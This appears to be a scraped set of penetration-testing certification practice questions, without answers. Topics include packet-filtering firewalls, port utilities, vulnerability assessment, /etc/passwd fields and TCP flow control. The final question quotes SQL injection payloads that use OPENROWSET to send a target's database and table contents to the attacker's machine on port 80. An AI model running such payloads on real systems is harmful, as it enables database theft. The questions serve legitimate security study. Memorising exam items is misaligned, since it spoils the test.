which level of the OSI model do the packet filtering firewalls work?
Packet filtering firewalls are usually a part of a router. In a packet filtering firewall, each
packet is compared to a set of criteria before it is forwarded.
Depending on the packet and the criteria, the firewall can:
i)Drop the packet
ii)Forward it or send a message to the originator
At which level of the OSI model do the packet filtering firewalls work?
Which of the following utility reports the port status of target TCP and UDP ports on a local or a remote comp
By default, the TFTP server listens on UDP port 69. Which of the following utility reports the
port status of target TCP and UDP ports on a local or a remote computer and is used to
troubleshoot TCP/IP connectivity issues?
Which of the following vulnerability assessment technique is used to test the web server infrastructure for an
Vulnerability assessment is an examination of the ability of a system or application, including
current security procedures and controls, to withstand assault. It recognizes, measures, and
classifies security vulnerabilities in a computer system, network, and communication
channels. A vulnerability assessment is used to identify weaknesses that could be exploited
and predict the effectiveness of additional security measures in protecting information
resources from attack.
Which of the following vulnerability assessment technique is used to test the web server
infrastructure for any misconfiguration and outdated content?
Which of the following methods is used to perform server discovery?
Which of the following methods is used to perform server discovery?
what does the bold letter string indicate?
In the example of a /etc/password file below, what does the bold letter string indicate?
nomad:HrLNrZ3VS3TF2:501:100: Simple Nomad:/home/nomad:/bin/bash
Which of the following policy forbids everything with strict restrictions on all usage of the company systems
Which of the following policy forbids everything with strict restrictions on all usage of the
company systems and network?
Which of the following flow control mechanism guarantees reliable delivery of data?
In the TCP/IP model, the transport layer is responsible for reliability and flow control from
source to the destination. TCP provides the mechanism for flow control by allowing the
sending and receiving hosts to communicate. A flow control mechanism avoids the problem
with a transmitting host overflowing the buffers in the receiving host.
Which of the following flow control mechanism guarantees reliable delivery of data?
Which of the following external pen testing tests reveals information on price, usernames and passwords, sessi
What query does he need in order to transfer the column?
A penetration tester tries to transfer the database from the target machine to a different
machine. For this, he uses OPENROWSET to link the target database to his own database,
replicates the database structure, and transfers the data to his machine by via a connection
to the remote machine on port 80.
The query he used to transfer databases was:
‘; insert into OPENROWSET
(‘SQLoledb’,’uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;’, ‘select * from
mydatabase..hacked_sysdatabases’) select * from master.dbo.sysdatabases –
The query he used to transfer table 1 was:
‘; insert into OPENROWSET(‘SQLoledb’,
‘uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;’, ‘select * from
mydatabase..table1′) select * from database..table1 –
What query does he need in order to transfer the column?